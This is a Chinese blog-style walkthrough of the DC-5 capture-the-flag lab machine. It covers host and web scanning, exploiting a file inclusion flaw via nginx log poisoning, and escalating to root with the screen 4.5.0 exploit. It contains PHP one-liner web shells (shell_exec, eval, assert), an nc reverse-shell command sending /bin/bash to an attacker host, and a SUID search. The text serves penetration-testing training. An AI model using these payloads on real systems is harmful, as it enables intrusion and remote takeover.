DC-5靶机WalkThrough
Posted zhaoritian12138
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC-5靶机WalkThrough相关的知识,希望对你有一定的参考价值。
DC~5:WalkThrough
信息收集
主机发现
nmap --system-dns -sP 10.0.0.1/24 --excludefile no_scan.txt | grep 10.0.0. | awk ‘{print $5}‘ > target.txt && cat target.txt
端口扫描
nmap -T4 -A -iL target.txt
网站扫描
使用skipfish对目标进行扫描,并将结果保存成web页面格式
skipfish -o /root/桌面/dc-5/ http://10.0.0.36
还有一个隐藏的页面
漏洞发现
访问目标80端口。访问contact.php,填写First Name和Last Name,发现数据以GET方式传递
当改变传入数据时,copyright的日期会发生变化
文件包含
结合刚才使用skipfish扫描到的隐藏php文件,猜测目标会调用该隐藏文件,所以尝试文件包含
成功读取到文件内容,目标存在文件包含
漏洞利用
写入php后门
接下来可以将php后门写入nginx日志中,nginx日志默认路径可以在网上搜索得知。写入后使用文件包含漏洞触发日志中的php后门代码。nginx默认日志路径为/var/log/nginx/access.log和/var/log/nginx/error.log
首先写入一句话后门到目标日志,这里需要使用burp修改GET请求
<? php echo shell_exec($_GET[‘cmd‘]);?>
反弹shell
然后执行nc命令将目标bash反弹给kali
kali侦听4444的端口成功获取shell
使用python“升级”获取的shell
提权
接下来收集目标机器有价值的信息,查看目标系统信息,查看suid权限的命令
find / -user root -perm -4000 -print 2>/dev/null
screen-4.5.0
screen-4.5.0有本地提权漏洞,可在searchsploit中搜索到相关漏洞
searchsploit screen 4.5.0
将41154.sh,复制到根目录,使用im打开,修改编码格式为linux上的编码格式
更改完成后使用file查看
由于无法在靶机扫荡编译c文件,所以只能在kali上先编译好再上传脚本所需文件到目标执行。按照脚本中的步骤手动创建文件,再执行所给的gcc命令,最后的文件是:
使用ftp获取所需文件
执行脚本
成功获取root权限,查看root目录
总结
nmap
nmap指定excludefile,不扫描文件中的IP
nmap --system-dns -sP 10.0.0.1/24 --excludefile no_scan.txt | grep 10.0.0. | awk ‘{print $5}‘ > target.txt && cat target.txt
skipfish
使用skipfish时,需先指定输出目录,再指定扫描的目标,否则程序会报错
skipfish -o /root/桌面/dc-5/ http://10.0.0.36
文件包含利用
单纯的文件包含漏洞危害可能不是很大,但是使用文件包含去访问具有恶意代码的文件时(如具有可执行权限的日志文件,攻击者通过某种手段将恶意代码写入日志文件中),可能会造成更严重的后果
NC获取shell
使用nc进行连接时,将shell传递给对方
nc -vlp 9527 #侦听端
nc -nv 10.0.0.26 -c /bin/bash #连接方传递bash到侦听端
PHP一句话后门
php一句话后门可参考网址
<? php echo shell_exec($_GET[‘cmd‘]);?>
<? php eval(@$_POST[‘arg‘]);?>
<? php assert(@$_POST[‘arg‘]);?>
以上是关于DC-5靶机WalkThrough的主要内容,如果未能解决你的问题,请参考以下文章